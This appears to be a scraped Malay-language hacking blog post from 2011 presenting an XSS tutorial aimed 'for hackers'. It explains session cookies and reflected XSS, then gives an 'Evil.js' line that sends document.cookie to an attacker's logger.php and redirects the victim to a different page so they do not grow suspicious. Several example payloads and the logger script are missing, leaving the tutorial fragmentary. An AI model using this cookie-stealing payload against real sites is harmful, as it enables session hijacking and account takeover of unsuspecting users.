popular post

popular post

http://4.bp.blogspot.com/-AexFsTTa33c/TmFNoxg9zSI/AAAAAAAAE6I/7K8bPKYBr8Q/s400/popular%2Bposts.jpg ‎4.bp.blogspot.com

popular post

http://4.bp.blogspot.com/-AexFsTTa33c/TmFNoxg9zSI/AAAAAAAAE6I/7K8bPKYBr8Q/s400/popular%2Bposts.jpg ‎4.bp.blogspot.com

info hacking

.....................................................jom chat di shoutbox ................>

try click

-----------klik unuk menderma

xss script untuk hacker

Dicatat oleh NICK KLUANG Saturday, January 29, 2011

XSS Tutorial

--==[Cr0ss-Site Scripting]==--

Apakah itu Xss(Cross-Site scripting)?

XSS, singkatan dari apa yang dikenali sebagai Cross-Site Scripting adalah proses menyuntik JavaScript (terutama) dan juga HTML ke sebuah laman web untuk maklum balas penting. Ulasan ini mungkin mengandungi banyak hal, salah, paling sering menjadi cookies pengguna. Sekarang, untuk semua orang membaca ini, saya berasumsi bahawa anda tahu apa cookies dan bagaimana ia digunakan pada laman web, tetapi jika tidak, saya akan menjelaskan anyways.


Kuki adalah pembolehubah yang web-browser gunakan untuk menyimpan log masuk anda. Tanpa cookies, anda tidak boleh "tetap masuk dalam" di laman web kegemaran anda. Hal ini penting kerana jika seseorang adalah untuk mendapatkan cookies anda, dia dengan mudah boleh spoof maklumat login anda tanpa perlu mengetahui password anda. Beberapa cookies cukup mendasar, seperti PHPSESSID, yang hanya sesi anda pada laman PHP powered. Jika website hanya menggunakan cookies PHPSESSID untuk mengesahkan penggunanya, seseorang dapat mencuri cookies melalui kerentanan XSS dan spoof siapa pun yang memiliki cookies penyerang.

"Hampir 90% website terdedah kepada serang XSS, tidak terkecuali website kerajaan"

--==[Dua Method Serangan XSS]==--

a) Dasar XSS (user-bentuk merefleksikan kembali XSS).
b) Memisahkan HTTP Respon.

1. Dasar XSS
a. Ini adalah sesuatu yang sederhana, seperti medan carian yang membolehkan masukkan HTML. Apabila pengguna mencari untuk sesuatu dan input tercermin pada halaman berikut, ini mungkin menunjukkan tanda-tanda kemungkinan XSS. Sekarang, ketika pengguna mencari sesuatu seperti

contoh :

Jika script (1) akan memaparkan kotak
www.nickkluang.blogspot.com
Jika untuk (2) akan terhasilnya tulisan di page.
www.nickkluang.blogspot.com
--==[Cara Bagaimana hendak mencuri Cookies melalui XSS attack]==--

[Code]


Ini adalah yang paling asas JavaScript untuk usaha mencuri cookies. Inilah yang kemungkinan besar akan ditempatkan di dalam salah satu daripada banyak fail. Js yang diambil oleh pelayan remote.

Script ini akan mengarahkan semula laman web untuk http://site.com/log.php?c [MEREKA COOKIE] = & redirect = http://siteb.com

GET c pembolehubah mengandungi cookies pengguna daripada laman berikut. Bahagian redirect hanyalah GET var yang akan mengarahkan mereka dari logger, untuk website lain, sehingga mereka tidak melihat TERLALU sesuatu yang aneh. Cara terbaik untuk mengelakkan kecurigaan adalah untuk mengarahkan mereka ke halaman yang sama, hanya halaman yang berbeza.

Keterangan JavaScript jika anda belum tahu itu:
document.location = ""; atau document.location (); adalah fungsi dalam JavaScript bahawa perubahan dokumen (halaman web)
lokasi. document.cookie adalah cara JavaScript cookies menyimpan maklumat pada sebuah laman web. Kebanyakan semuanya
dapat dipanggil dari dokumen .* apapun.


--==[Scripts Dan Syntax untuk log.php dan H3x4.js]==--

-Evil.js

document.location="http://yoursite.com/logger.php?cookie="+document.cookie+"&redirect=http://theirsite.com/diff_page.php";

-Log.php



kemudian simpan di remote server (server anda)

nuff

comment

page transate